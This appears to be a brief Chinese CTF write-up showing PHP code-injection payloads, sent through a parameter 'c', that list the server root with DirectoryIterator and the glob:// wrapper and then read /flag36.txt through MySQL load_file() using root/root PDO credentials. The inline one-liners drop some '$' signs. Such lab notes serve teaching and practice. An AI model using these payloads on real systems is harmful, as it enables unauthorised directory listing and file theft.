开启环境:
先直接用伪协议获取 flag 位置
c=?><?php a=new DirectoryIterator("glob:///\*"); foreach(a as f) {echo(f->__toString().' ');} exit(0); ?>
c=try {dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach(dbh->query('select load_file("/flag36.txt")') as row){echo(row[0])."|"; }dbh = null;}catch (PDOException e) {echo $e->getMessage();exit(0);}exit(0);
try {
创建 PDO 实例, 连接 MySQL 数据库
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。
foreach(dbh-\>query('select load_file("/flag36.txt")') as row) {
echo($row[0])."|";
}
$dbh = null;
}
catch (PDOException $e) {
echo $e->getMessage();exit(0);
}
exit(0);